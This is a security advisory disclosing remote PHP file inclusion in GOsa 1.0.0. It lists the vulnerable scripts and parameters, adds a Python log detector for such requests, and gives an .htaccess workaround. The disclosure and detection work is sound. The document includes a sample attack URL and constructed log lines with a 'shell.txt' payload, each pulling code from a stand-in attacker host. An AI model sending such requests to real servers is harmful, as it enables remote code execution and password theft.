GOnicus System Administrator php injection

From: Karol Wiesek (appelast@bsquad.sm.pl)
Date: 02/24/03

    Date: Mon, 24 Feb 2003 17:44:19 +0100
    From: Karol Wiesek <appelast@bsquad.sm.pl>
    To: bugtraq@securityfocus.com
    
    

    I. BACKGROUND

    The GOnicus System Administrator is a PHP based administration tool
    for managing accounts/systems in LDAP databases.

    Project homepage : http://www.gonicus.de

    II. DESCRIPTION

    A remote attacker can inject arbitrary PHP code into GOsa and have it
    executed under the privileges of the underlying web server. There are
    several places where an attacker can achieve this by supplying a
    request variable that GOsa passes unchecked to include().

    By setting the "plugin" variable in the following files, an attacker
    can include remote files and have them executed as PHP code:

    plugins/3fax/1blocklists/index.php
    plugins/2administration/6departamentadmin/index.php
    plugins/2administration/5terminals/index.php
    plugins/2administration/4mailinglists/index.php
    plugins/2administration/3departaments/index.php
    plugins/2administration/2groupd/index.php

    The same situation exists in include/help.php, where the "base"
    variable can be set to a remote host so that a file is included from
    the attacker's server.

    The following is a sample attack URL that would cause
    "target.server" to load include/common.inc from
    "attackers.server".

    http://target.server/include/help.php?base=http://attackers.server/

    GOsa doesn't support "register_globals off", so these variables can
    be set directly from the query string of any request.
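    The attack URL above leaves a recognisable trace in the web server's
    access log: a request for one of the listed scripts whose "base" or
    "plugin" parameter carries a URL scheme. The following detector is an
    added example and not part of the original advisory or of GOsa itself;
    it assumes the Apache combined log format, and the log lines it scans
    are constructed for the example (the hostnames are the placeholders
    used in this advisory). It decodes the query string before matching so
    that percent-encoded schemes are caught, and it ignores values that are
    plain local paths, since only remote includes are described here.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Scripts named in the advisory as passing a request variable to include(),
# keyed by the parameter each script trusts.
VULNERABLE_ENDPOINTS = {
    "/include/help.php": "base",
    "/plugins/3fax/1blocklists/index.php": "plugin",
    "/plugins/2administration/6departamentadmin/index.php": "plugin",
    "/plugins/2administration/5terminals/index.php": "plugin",
    "/plugins/2administration/4mailinglists/index.php": "plugin",
    "/plugins/2administration/3departaments/index.php": "plugin",
    "/plugins/2administration/2groupd/index.php": "plugin",
}

# Apache combined log format (assumption: adjust for other formats).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3}) \S+'
)

# A value with one of these schemes makes include() fetch over the network
# (allow_url_fopen) instead of reading from the local tree.
REMOTE_SCHEME_RE = re.compile(r'^\s*(https?|ftp)://', re.IGNORECASE)

# Constructed sample log: two remote-include attempts, one harmless local
# "base" value, and an unrelated request.
SAMPLE_LOG = [
    '10.0.0.7 - - [24/Feb/2003:17:44:19 +0100] "GET /include/help.php?base=http://attackers.server/ HTTP/1.0" 200 512',
    '10.0.0.7 - - [24/Feb/2003:17:44:21 +0100] "GET /gosa/plugins/2administration/5terminals/index.php?plugin=http%3A%2F%2Fattackers.server%2Fshell.txt%3F HTTP/1.0" 200 1203',
    '10.0.0.9 - - [24/Feb/2003:17:45:02 +0100] "GET /include/help.php?base=/usr/share/gosa/ HTTP/1.0" 200 2048',
    '10.0.0.9 - - [24/Feb/2003:17:45:10 +0100] "GET /index.php HTTP/1.0" 200 4096',
]


def is_rfi_attempt(target):
    """Return (endpoint, param, value) when the request target hits one of the
    listed scripts with a remote URL in its trusted parameter, else None."""
    parts = urlsplit(target)
    # The application may live under a prefix such as /gosa, so match suffixes.
    path = unquote(parts.path)
    for endpoint, param in VULNERABLE_ENDPOINTS.items():
        if path.endswith(endpoint):
            # parse_qs already percent-decodes; the extra unquote also catches
            # a doubly-encoded scheme.
            values = parse_qs(parts.query, keep_blank_values=True).get(param, [])
            for value in values:
                if REMOTE_SCHEME_RE.match(unquote(value)):
                    return (endpoint, param, value)
    return None


def scan_log(lines):
    """Scan access-log lines and return one finding per remote-include attempt."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not combined-format; skip rather than guess
        finding = is_rfi_attempt(m.group("target"))
        if finding is None:
            continue
        endpoint, param, value = finding
        hits.append({
            "ip": m.group("ip"),
            "time": m.group("ts"),
            "endpoint": endpoint,
            "param": param,
            "value": value,
            "status": int(m.group("status")),
        })
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print("{ip} {time} {endpoint} {param}={value} ({status})".format(**hit))
```

    A 200 status on a flagged request means the server answered the
    include attempt normally, which is exactly what a successful remote
    include looks like from the outside; treat such hits as a likely
    compromise of the web server account, not merely as a scan.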

    III. ANALYSIS

    Remote exploitation allows an attacker to execute arbitrary
    commands and code under the privileges of the web server. This also
    opens the door to privilege escalation attacks. An attacker could also
    debug httpd child processes and grab secret information such as users'
    system passwords and LDAP passwords.

    IV. DETECTION

    GOsa version 1.0.0 ( current ) is confirmed vulnerable.

    V. Workaround

    A temporary solution is to enable Apache .htaccess authentication in
    all subdirectories containing .php files that are meant to be included
    by other scripts rather than requested directly. With the password
    file pointed at /dev/null, no credentials can ever match, so direct
    requests to those scripts are refused, while include() from other PHP
    files still works because it reads from the filesystem and does not
    pass through the web server's access checks.

    Example .htaccess file

    AuthType Basic
    AuthName koza
    AuthUserFile /dev/null
    require valid-user

    Karol Wiesek [appelast-at-bsquad.sm.pl]